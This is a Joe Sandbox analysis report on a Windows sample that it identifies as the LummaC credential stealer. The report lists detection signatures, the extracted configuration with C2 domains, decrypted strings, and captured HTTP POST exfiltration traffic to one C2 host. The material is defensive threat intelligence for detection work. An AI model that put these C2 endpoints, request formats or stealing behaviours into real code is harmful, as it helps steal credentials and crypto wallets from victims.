Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1B_131.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1B_131.exe
Analysis ID:1481247
MD5:a2860db7149c32113ae0e57f4b3ab327
SHA1:6030980c88afc150475570118adb6fc5864ce27f
SHA256:e4e908772ae91c05f1f95ef06e1d70981db266c18717228da99d02df555b5725
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Lisect_AVT_24003_G1B_131.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe" MD5: A2860DB7149C32113AE0E57F4B3AB327)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Suricata Signatures

              Timestamp:2024-07-25T06:32:22.783296+0200
              SID:2844041
              Source Port:49709
              Destination Port:443
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T06:32:18.200098+0200
              SID:2028371
              Source Port:49707
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:17.529035+0200
              SID:2048094
              Source Port:49706
              Destination Port:443
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T06:32:15.786545+0200
              SID:2028371
              Source Port:49705
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:23.801097+0200
              SID:2028371
              Source Port:49710
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:17.095113+0200
              SID:2028371
              Source Port:49706
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:33:09.496760+0200
              SID:2022930
              Source Port:443
              Destination Port:49717
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T06:32:16.198325+0200
              SID:2054653
              Source Port:49705
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T06:32:31.135756+0200
              SID:2022930
              Source Port:443
              Destination Port:49711
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T06:32:14.809412+0200
              SID:2028371
              Source Port:49704
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:23.805727+0200
              SID:2843864
              Source Port:49710
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T06:32:19.915054+0200
              SID:2028371
              Source Port:49708
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:22.373614+0200
              SID:2028371
              Source Port:49709
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T06:32:14.245872+0200
              SID:2050741
              Source Port:64356
              Destination Port:53
              Protocol:UDP
              Classtype:Domain Observed Used for C2 Detected
              Timestamp:2024-07-25T06:32:15.288502+0200
              SID:2054653
              Source Port:49704
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: Lisect_AVT_24003_G1B_131.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://resergvearyinitiani.shop/apiAvira URL Cloud: Label: malware
              Source: technologyenterdo.shopAvira URL Cloud: Label: malware
              Source: associationokeo.shopAvira URL Cloud: Label: malware
              Source: turkeyunlikelyofw.shopAvira URL Cloud: Label: malware
              Source: detectordiscusser.shopAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.2.Lisect_AVT_24003_G1B_131.exe.aa0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}
              Multi AV Scanner detection for submitted file
              Source: Lisect_AVT_24003_G1B_131.exeReversingLabs: Detection: 50%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: associationokeo.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: turkeyunlikelyofw.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: pooreveningfuseor.pw
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: edurestunningcrackyow.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: detectordiscusser.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: problemregardybuiwo.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: lighterepisodeheighte.fun
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: technologyenterdo.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: resergvearyinitiani.shop
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2208367316.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpString decryptor: GhJLkO--seevpalpadin
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: associationokeo.shop
              Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
              Source: Malware configuration extractorURLs: pooreveningfuseor.pw
              Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
              Source: Malware configuration extractorURLs: detectordiscusser.shop
              Source: Malware configuration extractorURLs: problemregardybuiwo.fun
              Source: Malware configuration extractorURLs: lighterepisodeheighte.fun
              Source: Malware configuration extractorURLs: technologyenterdo.shop
              Source: Malware configuration extractorURLs: resergvearyinitiani.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13687Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16230Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20574Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: resergvearyinitiani.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572993Host: resergvearyinitiani.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: resergvearyinitiani.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206913461.0000000000762000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207870757.0000000000763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/))
              Source: Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apiK
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apiW
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095048923.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/apik
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/f
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u
              Source: Lisect_AVT_24003_G1B_131.exeStatic PE information: section name: .&u&u
